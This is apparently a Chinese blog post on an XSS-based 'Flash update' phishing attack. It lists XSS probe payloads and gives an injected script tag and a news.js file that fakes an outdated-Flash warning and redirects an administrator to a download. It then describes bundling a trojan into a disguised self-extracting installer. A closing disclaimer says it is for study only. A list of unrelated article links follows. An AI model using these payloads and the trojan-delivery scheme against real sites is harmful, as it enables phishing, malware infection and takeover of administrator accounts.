• Xss“实战”flash钓鱼


    0x01 找到存在注入的目标站点

        

    2、检测方法

    通常有一些方式可以测试网站是否有正确处理特殊字符:

    • ><script>alert(document.cookie)</script>
    • ='><script>alert(document.cookie)</script>
    • "><script>alert(document.cookie)</script>
    • <script>alert(document.cookie)</script>
    • <script>alert (vulnerable)</script>
    • %3Cscript%3Ealert('XSS')%3C/script%3E
    • <script>alert('XSS')</script>
    • <img src="javascript:alert('XSS')">
    • <img src="http://888.888.com/999.png" onerror="alert('XSS')">
    • <div style="height:expression(alert('XSS'),1)"></div>(这个仅于IE7(含)之前有效)

    2、攻击思路  

    站点含有Xss漏洞,但现在大部分站点都使用了Httponly,因此暂且无法劫持Cookie。此时可以进行Xss钓鱼,伪造登陆界面,获取管理账号密码,提升权、访问量极大的一些页面上的XSS可以攻击一些小型网站,实现DOS攻击的效果.

    修改官方页面源码

     设计好用于迷惑目标点击触发的页面,购买一个相似的域名。把脚本代码插入到留言或者可以与目标活动的地方。

    <script src="https://www.test.flash.com/news.js"> </script>

     news.js

        window.alert = function(name){
        var iframe = document. createElement("IFRAME");
        iframe.style.display="none";
        iframe.setAttribute("src",'data:text/plain,');
        document. documentElement.appendChild(iframe);
        window.frames [0].window.alert(name);
        iframe.parentNode.removeChild(iframe);
        }
        alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
        window. location.href="http://www.test.com";

    管理员查看留言回复时弹出提示,点击便会下载运行后便会触发木马程序

    跳转到我们捆绑好木马的flash下载地址

    0x02捆绑木马制作

     

     

     

    修改文件图标 使用工具

    下载地址:http://www.angusj.com/resourcehacker/#download

     完成后文件可以自解压然后运行

    目标触发木马获取到权限后可以修改news.js,此时网页不再可访。

    严格遵守网络安全法,请勿用于其他非法途径!此文用于学习交流。

  • 相关阅读:
    如何动态调用WebServices
    Cache及(HttpRuntime.Cache与HttpContext.Current.Cache)
    SQL创建索引(转)
    TSQL用法四:OpenDataSource, OpenRowSet
    AppDomain动态加载程序集
    hdu 2544 最短路
    hdu 1151 Air Raid
    hdu3790 最短路径问题
    hdu 1548 A strange lift
    对于 前K短路径问题 和 A*算法 的一些小小总结
  • 原文地址:https://www.cnblogs.com/Gouwa/p/13038947.html
Copyright © 2020-2023  润新知